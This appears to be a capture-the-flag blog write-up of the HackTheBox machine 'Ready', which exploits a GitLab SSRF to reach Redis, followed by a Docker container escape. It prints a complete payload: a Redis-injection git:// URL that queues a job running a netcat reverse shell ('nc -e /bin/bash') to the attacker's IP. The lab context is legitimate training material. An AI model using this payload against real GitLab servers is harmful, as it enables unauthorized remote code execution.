Ready — HackTheBox

Source

Passwords, hashes and Flags will be redacted to encourage you to solve those challenges on your own.

Synopsis

Skills Required

Skills Learned

Enumeration

nmap
register
gitlab version

Vulnerability Details

commits

Initial Access

create project
setup SSRF Bypass

http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git

Note: start a netcat listener on any port.

input payload

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test
multi

sadd resque:gitlab:queues system_hook_push

lpush resque:gitlab:queue:system_hook_push “{\”class\”:\”GitlabShellWorker\”,\”args\”:[\”class_eval\”,\”open(\’|nc -e /bin/bash 10.10.14.24 4444\’).read\”],\”retry\”:3,\”queue\”:\”system_hook_push\”,\”jid\”:\”ad52abc5641173e217eb2e52\”,\”created_at\”:1513714403.8122594,\”enqueued_at\”:1513714403.8129568}”

exec

exec

exec

reverse connection
exploit
reverse connection
user flag

Privilege Escalation

linpeas
Configuration files
docker composer
linpeas
Container root
host filesystem
mount filesystem
host filesystem
root flag

Thank you for reading this blog. While attempting this challenge I learned so many things. This was unique target with unique vulnerability.

Reference

https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
https://gitlab.com/gitlab-org/gitlab-foss/-/commit/ecbdef090277848d409ed7f97f69f53bbac7a92c
https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout#privileged-flag

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store